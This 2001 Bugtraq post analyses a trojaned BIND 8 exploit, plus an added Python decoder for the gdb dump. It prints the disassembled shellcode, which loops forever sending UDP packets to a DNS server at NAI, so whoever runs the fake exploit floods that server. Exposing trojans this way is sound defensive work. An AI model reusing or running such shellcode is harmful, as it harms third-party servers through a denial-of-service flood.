[18926] in bugtraq
Re: Bind 8 Exploit - Trojan
daemon@ATHENA.MIT.EDU (Sergei)
Thu Feb 1 14:06:02 2001
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.10102011556280.16846-100000@mole.nixu.fi>
Date: Thu, 1 Feb 2001 16:01:24 +0200
Reply-To: Sergei <Sergei.Ledovskij@NIXU.FI>
From: Sergei <Sergei.Ledovskij@NIXU.FI>
To: BUGTRAQ@SECURITYFOCUS.COM
Analysis of the bind8 trojaned exploit
--------------------------------------
here's the code:
0x8049540 <shellcode>: jmp 0x8049576 <shellcode+54>
0x8049542 <shellcode+2>: pop %esi
0x8049543 <shellcode+3>: mov $0x1,%ebx
0x8049548 <shellcode+8>: mov %esi,%ecx
0x804954a <shellcode+10>: mov $0x66,%eax
0x804954f <shellcode+15>: int $0x80
0x8049551 <shellcode+17>: mov %eax,0x14(%esi)
0x8049554 <shellcode+20>: lea 0x30(%esi),%eax
0x8049557 <shellcode+23>: mov %eax,0x18(%esi)
0x804955a <shellcode+26>: xor %eax,%eax
0x804955c <shellcode+28>: mov %eax,0x20(%esi)
0x804955f <shellcode+31>: lea 0xc(%esi),%eax
0x8049562 <shellcode+34>: mov %eax,0x24(%esi)
0x8049565 <shellcode+37>: mov $0x66,%eax
0x804956a <shellcode+42>: mov $0xb,%ebx
0x804956f <shellcode+47>: lea 0x14(%esi),%ecx
0x8049572 <shellcode+50>: int $0x80
0x8049574 <shellcode+52>: jmp 0x8049565 <shellcode+37>
0x8049576 <shellcode+54>: call 0x8049542 <shellcode+2>
here's what it does:
<shellcode>: jmp 0x8049576 <shellcode+54>
<shellcode+2>: pop %esi
address of data into %esi
<shellcode+3>: mov $0x1,%ebx
<shellcode+8>: mov %esi,%ecx
<shellcode+10>: mov $0x66,%eax
<shellcode+15>: int $0x80
eax = 0x66 (102 is the syscall number of socketcall)
ebx = 0x1 (1 is the call number of sys_socket)
ecx = shellcode+59 (address of args)
(gdb) x/3 shellcode+59
<shellcode+59>: 0x00000002 0x00000002 0x00000011
family = 2 (AF_INET, <linux/socket.h>)
type = 2 (SOCK_DGRAM, <asm/socket.h>)
protocol = 0x11 (17, IPPROTO_UDP, <linux/in.h>)
socket descriptor is returned in %eax
<shellcode+17>: mov %eax,0x14(%esi)
store the descriptor at shellcode+79
<shellcode+20>: lea 0x30(%esi),%eax
get address of shellcode+107 (beginning of the actual exploit code) into %eax
<shellcode+23>: mov %eax,0x18(%esi)
store that address in shellcode+83
<shellcode+26>: xor %eax,%eax
zero out eax
<shellcode+28>: mov %eax,0x20(%esi)
store that zero into shellcode+91 (these are the sendto flags, but read on)
<shellcode+31>: lea 0xc(%esi),%eax
get address of shellcode+71 (struct sockaddr for sendto, but read on) into %eax
<shellcode+34>: mov %eax,0x24(%esi)
store that address into shellcode+95
<shellcode+37>: mov $0x66,%eax
<shellcode+42>: mov $0xb,%ebx
<shellcode+47>: lea 0x14(%esi),%ecx
eax = 0x66 (102 is the syscall number of socketcall)
ebx = 0xb (11 is the call number of sys_sendto)
ecx = shellcode+79 (address of args)
args are (int fd, void *buff, size_t len, unsigned flags, struct sockaddr *addr, int addr_len),
thus:
fd = [shellcode+79] = value returned by the socket call (socket descriptor)
buff = [shellcode+83] = shellcode+107 = that's where the actual exploit code is stored, I presume
len = [shellcode+87] = 0x400, send 1024 bytes
(gdb) x/1 shellcode+87
<shellcode+87>: 0x00000400
flags = [shellcode+91] = 0, no special flags
addr = [shellcode+95] = shellcode+71, this is struct sockaddr_in
(gdb) x/10 shellcode+71
<shellcode+71>: 0x35000002 0x960345a1 0xffffffff 0xffffffef
<shellcode+87>: 0x00000400 0x00000000 0x809a5f02 0x00000010
<shellcode+103>: 0x6e69622f 0x0068732f
struct sockaddr_in {
sa_family_t sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
...
};
thus:
sin_family = 0x0002 (AF_INET)
sin_port = 0x3500 (or in host order 0x0035, which is 53)
sin_addr = 0x960345a1 as gdb prints it, i.e. the bytes a1 45 03 96 in memory (nothing other than 161.69.3.150, dns1.nai.com)
addr_len = [shellcode+99] = 0x10 (16 bytes, the length of struct sockaddr)
<shellcode+50>: int $0x80
do the sendto() call
<shellcode+52>: jmp 0x8049565 <shellcode+37>
jump back and call sys_sendto() again, forever
<shellcode+54>: call 0x8049542 <shellcode+2>
call used to get the address of data (we jump here in the beginning)
<shellcode+59>:
data starts here.
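As an added example (not part of Sergei's post), here is a small Python decoder that turns the gdb dump words above back into their in-memory bytes and recovers the sendto() destination, length and flags from them the same way the analysis does; the data offsets 71, 79 and 103 are the ones established in the post.

```python
import socket
import struct

# Words from the post's "x/10 shellcode+71" gdb dump, as gdb printed them
# (little-endian x86, so each word's bytes are reversed in memory).
DUMP_WORDS = [0x35000002, 0x960345a1, 0xffffffff, 0xffffffef,
              0x00000400, 0x00000000, 0x809a5f02, 0x00000010,
              0x6e69622f, 0x0068732f]
DUMP_BASE = 71          # shellcode offset of the first dumped word
SOCKADDR_OFF = 71       # struct sockaddr_in the shellcode hands to sendto
SENDTO_ARGS_OFF = 79    # six-word sys_sendto argument block
STRING_OFF = 103        # trailing NUL-terminated string after the args

def words_to_bytes(words):
    """Turn gdb's little-endian words back into the raw byte layout."""
    return b"".join(struct.pack("<I", w) for w in words)

def decode_sockaddr_in(raw):
    """Decode a struct sockaddr_in exactly as it lies in memory:
    sin_family is host order, sin_port and sin_addr are network order."""
    family = struct.unpack("<H", raw[0:2])[0]
    port = struct.unpack("!H", raw[2:4])[0]
    return {"family": "AF_INET" if family == socket.AF_INET else family,
            "port": port, "addr": socket.inet_ntoa(raw[4:8])}

def decode_trojan_data(words=DUMP_WORDS, base=DUMP_BASE):
    """Recover what the looping sendto() transmits, and where it goes."""
    data = words_to_bytes(words)
    rel = lambda off: off - base            # shellcode offset -> dump offset
    fd, buf, length, flags, addr_ptr, addr_len = struct.unpack(
        "<6I", data[rel(SENDTO_ARGS_OFF):rel(SENDTO_ARGS_OFF) + 24])
    dest = decode_sockaddr_in(data[rel(SOCKADDR_OFF):rel(SOCKADDR_OFF) + addr_len])
    tail = data[rel(STRING_OFF):].split(b"\x00", 1)[0].decode("ascii")
    return {"fd_slot": fd, "buf_slot": buf, "len": length, "flags": flags,
            "addr_ptr": addr_ptr, "addr_len": addr_len, "dest": dest, "string": tail}

if __name__ == "__main__":
    info = decode_trojan_data()
    print(f"sends {info['len']} bytes (flags={info['flags']}) to "
          f"{info['dest']['addr']}:{info['dest']['port']} ({info['dest']['family']}), "
          f"trailing string {info['string']!r}")
```

The fd and buffer slots still hold their pre-execution placeholder values in this dump because it was taken before the socket call filled them in.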
Lesson:
-------
Use the force, read the source!
--
Sergei Ledovskij +358(40)8245708 solid@nixu.fi
Makelankatu 91 PO. 21 Helsinki 00601 Finland